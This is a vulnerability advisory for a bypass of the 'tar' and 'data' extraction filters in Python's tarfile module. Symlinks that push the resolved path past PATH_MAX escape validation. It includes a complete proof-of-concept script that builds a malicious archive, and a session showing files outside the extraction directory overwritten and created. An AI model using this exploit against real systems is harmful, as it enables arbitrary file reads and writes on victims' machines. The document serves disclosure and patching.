Python's TarFile.extractall()
and TarFile.extract()
methods support a feature that allows a filter to be set to improve the safety of using these methods. Python's standard library provides two implementations tar_filter
("tar") and data_filter
("data"), each with differing checks to improve the safety of tarfile extraction.
A bug exists when processing a path with symlinks is shorter than PATH_MAX
, but longer than PATH_MAX
when the symlinks are substituted by os.path.realpath()
. Any symlinks that are beyond PATH_MAX
are not expanded.
os.path.realpath()
is used by the "tar" and "data" filter to validate the path, but no error is thrown if PATH_MAX is exceeded. Later during extractall()
or extract()
the paths are used without passing them through os.path.realpath()
.
This bug allows for arbitrary file reads and writes outside of the destination path. It has been tested successfully on Linux and OSX.
Critical - Anyone using the TarFile.extractall()
or TarFile.extract()
with filter="data"
or filter="tar"
, directly or indirectly, must patch immediately, or introduce other mitigating controls.
This proof-of-concept assumes it is being run under /home/username
.
The tar file created in this PoC will modify the /home/username/flag/flag
file that exists outside of the destination path the tar file is extracted into. The tar file will also create /home/username/flag/newfile
.
The PoC has been successfully run in Python 3.12.3 and Python 3.13.3 on Linux and Python 3.13.0 on OSX.
$ pwd /home/username $ mkdir flag $ echo "hello world" > flag/flag
import tarfile import os import io import sys # 247 (55 on OSX) picked so the expanded path of dirs is 3968 bytes long (or 896 # on OSX), leaving 128 bytes for a prefix and at least a few chars of the link comp = 'd' * (55 if sys.platform == 'darwin' else 247) steps = "abcdefghijklmnop" path = "" with tarfile.open("poc.tar", mode="x") as tar: # populate the symlinks and dirs that expand in os.path.realpath() for i in steps: a = tarfile.TarInfo(os.path.join(path, comp)) a.type = tarfile.DIRTYPE tar.addfile(a) b = tarfile.TarInfo(os.path.join(path, i)) b.type = tarfile.SYMTYPE b.linkname = comp tar.addfile(b) path = os.path.join(path, comp) # create the final symlink that exceeds PATH_MAX and simply points to the # top dir. this allows *any* path to be appended. # this link will never be expanded by os.path.realpath(), nor anything after it. linkpath = os.path.join("/".join(steps), "l"*254) l = tarfile.TarInfo(linkpath) l.type = tarfile.SYMTYPE l.linkname = ("../" * len(steps)) tar.addfile(l) # make a symlink outside to keep the tar command happy e = tarfile.TarInfo("escape") e.type = tarfile.SYMTYPE e.linkname = linkpath + "/../flag" tar.addfile(e) # use the symlinks above, that are not checked, to create a hardlink # to a file outside of the destination path f = tarfile.TarInfo("flaglink") f.type = tarfile.LNKTYPE f.linkname = "escape/flag" tar.addfile(f) # now that we have the hardlink we can overwrite the file content = b"overwrite\n" c = tarfile.TarInfo("flaglink") c.type = tarfile.REGTYPE c.size = len(content) tar.addfile(c, fileobj=io.BytesIO(content)) # we can also create new files as well! content = b"new!\n" n = tarfile.TarInfo("escape/newfile") n.type = tarfile.REGTYPE n.size = len(content) tar.addfile(n, fileobj=io.BytesIO(content))
$ pwd /home/username $ ls flag # check the flag dir and file are unchanged flag $ cat flag/flag hello world $ mkdir test # this is where the tar is extracted $ mkdir otherdir # this is a dummy dir to keep everything clean $ cd otherdir $ python3 Python 3.12.3 (main, Apr 10 2024, 05:33:47) [GCC 13.2.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> c >>> CTRL-D $ cd .. $ ls flag # the flag dir is different! flag newfile $ cat flag/flag overwrite $ cat flag/newfile new!
Date reported: 04/30/2025
Date fixed:
Date disclosed: 07/20/2025